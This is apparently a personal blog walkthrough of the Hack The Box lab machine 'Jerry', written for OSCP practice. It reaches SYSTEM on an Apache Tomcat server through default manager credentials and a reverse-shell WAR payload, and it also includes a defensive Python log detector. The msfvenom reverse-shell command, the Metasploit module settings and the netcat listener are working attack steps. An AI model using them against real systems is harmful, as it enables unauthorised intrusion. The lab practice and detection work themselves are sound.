Path to OSCP: Jerry

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Jerry, starting off with the usual nmap scan (I hope to do a deeper dive on nmap scanning shortly; I’m sure there are more efficient and faster nmap flags when it comes to OSCP/CTFs).

dr@nostromo:~$ sudo nmap -p- -A jerry.htb -oA nmap/jerry
[sudo] password for dr:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 15:22 BST
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.038s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   51.81 ms 10.10.14.1
2   51.95 ms jerry.htb (10.10.10.95)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.78 seconds

Just a single port open, TCP 8080 running Apache Tomcat.

I like to kick off some directory fuzzing whenever a web server is discovered. Again, this is something I need to look into for efficiencies and how the various tools compare, but for now I instinctively kick off either ffuf or gobuster with a standard dictionary file while I perform further manual enumeration, as these scans can take quite a while to complete.

dr@nostromo:~$ gobuster dir -u http://jerry.htb:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://jerry.htb:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/13 16:12:03 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 0]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 0]
/http%3A%2F%2Fblog    (Status: 400) [Size: 0]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 0]
/External%5CX-News    (Status: 400) [Size: 0]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 0]
/http%3A%2F%2Fradar   (Status: 400) [Size: 0]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 0]
/http%3A%2F%2Fweblog  (Status: 400) [Size: 0]
/http%3A%2F%2Fswik    (Status: 400) [Size: 0]
Progress: 220558 / 220561 (100.00%)
===============================================================
2023/08/13 16:29:03 Finished
===============================================================

In this case, nothing was discovered that couldn’t have been found from the front page itself (Tomcat Web Application Manager), but at least there’s some peace of mind that there’s unlikely to be a simple CTF-style open directory for a foothold. It’s looking likely that this will involve a known vulnerability related to the Apache Tomcat/Coyote JSP version.

A search on searchsploit for Apache 7.0 reveals the below as most interesting:

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution
Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass

I initially attempted manual PUT requests with Burp Suite to trigger a POC, as detailed at Apache Tomcat RCE if readonly set to false (CVE-2017-12617) – Alphabot Security, but no success. I next try the available Python script from searchsploit, 42966.py, but this also fails, with the output “Not Vulnerable to CVE-2017-12617”.

dr@nostromo:~$ python 42966.py -u http://jerry.htb:8080

  _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
 / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  | 
| |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
| |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / / 
| |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / / 
 \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/

[@intx0x80]

Poc Filename  Poc.jsp 
Not Vulnerable to CVE-2017-12617

After these failed attempts at CVE-2017-12617, it’s back to searchsploit, this time looking into Apache Manager, which throws up a few more leads:

Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Metasploit) 
Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Metasploit)

Application Upload sounds promising: “used to execute a payload on Apache Tomcat servers that have an exposed ‘manager’ application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component”.

I load up the module in Metasploit and see that it requires authentication. This leads me to attempting a few Apache Tomcat default passwords, as found here: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

I get a hit from this list, and we’re into the Tomcat Web Application Manager:

More importantly, we have all the details we need to plug into the Metasploit module, including modifying the payload for Windows:

msf6 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

  Name          Current Setting  Required  Description 
  ----          ---------------  --------  ----------- 
  HttpPassword  s3cret           no        The password for the specified username 
  HttpUsername  tomcat           no        The username to authenticate as 
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...] 
  RHOSTS        10.10.10.95      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html 
  RPORT         8080             yes       The target port (TCP) 
  SSL           false            no        Negotiate SSL/TLS for outgoing connections 
  TARGETURI     /manager/        yes       The URI path of the manager app (/html/upload and /undeploy will be used) 
  VHOST                          no        HTTP server virtual host


Payload options (windows/shell/reverse_tcp):

  Name      Current Setting  Required  Description 
  ----      ---------------  --------  ----------- 
  EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none) 
  LHOST     10.10.14.3       yes       The listen address (an interface may be specified) 
  LPORT     7777             yes       The listen port


Exploit target:

  Id  Name 
  --  ---- 
  1   Windows Universal

We run the module, and immediately gain system access to retrieve both the user and root flags (“2 for the price of 1.txt”):

As with the previous box, this would be a waste of a Metasploit module in the actual OSCP exam, so let’s look at manual exploitation.

With access to the Manager, we can upload a malicious WAR file, and execute it in the browser to trigger a reverse shell to our system.
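The manager-app path walked through above (default-credential guessing against /manager/html, then a WAR deploy via /manager/html/upload and a first request to the new context) leaves a clear trail in Tomcat’s access log. As an added example that is not part of the original post, the Python below parses lines in Tomcat’s default AccessLogValve format and flags both stages; the log lines, the guessing threshold and the CSRF nonce value are constructed for illustration.

```python
import re
from collections import defaultdict

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
# e.g. 10.0.0.5 - tomcat [13/Aug/2023:16:40:01 +0100] "POST /manager/html/upload HTTP/1.1" 302 -
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample log: a burst of failed logins to the manager app,
# then a successful login, a WAR upload, and the new context being requested.
SAMPLE_LOG = """\
10.10.14.3 - - [13/Aug/2023:16:40:01 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - admin [13/Aug/2023:16:40:02 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - admin [13/Aug/2023:16:40:03 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - tomcat [13/Aug/2023:16:40:04 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - role1 [13/Aug/2023:16:40:05 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - tomcat [13/Aug/2023:16:40:06 +0100] "GET /manager/html HTTP/1.1" 200 20213
10.10.14.3 - tomcat [13/Aug/2023:16:41:10 +0100] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 302 -
10.10.14.3 - - [13/Aug/2023:16:41:30 +0100] "GET /at/ HTTP/1.1" 200 0
10.10.10.2 - - [13/Aug/2023:16:42:00 +0100] "GET /docs/ HTTP/1.1" 200 13411
"""

def parse(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text, guess_threshold=5):
    """Return (finding, source host, authenticated user) tuples for manager-app abuse."""
    failures = defaultdict(int)  # host -> number of 401s against /manager/
    findings = []
    for line in log_text.splitlines():
        e = parse(line)
        if not e:
            continue
        path = e["path"].split("?", 1)[0]  # drop the query string (e.g. the CSRF nonce)
        if path.startswith("/manager/") and e["status"] == "401":
            failures[e["host"]] += 1
            if failures[e["host"]] == guess_threshold:  # report once per host
                findings.append(("manager-credential-guessing", e["host"], None))
        elif (e["method"] == "POST" and path == "/manager/html/upload"
              and e["status"] in ("200", "302")):
            # an accepted upload means an authenticated user deployed a WAR
            findings.append(("war-deployed-via-manager", e["host"], e["user"]))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Remediation follows directly from the findings: rotate any manager account that authenticated from an unexpected host, and undeploy the context that appeared right after the upload.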

Using msfvenom we create the payload:

dr@nostromo:~$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=7777 -f war -o at.war
Payload size: 13318 bytes
Final size of war file: 13318 bytes
Saved as: at.war

We then upload it under the Deploy section of the Apache Tomcat Manager, which results in the below:

We set up a netcat listener on the port we specified in msfvenom, and can trigger the payload by either clicking the /at link in the above Manager window or browsing directly to http://jerry.htb:8080/at/, resulting in a system shell:

dr@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>
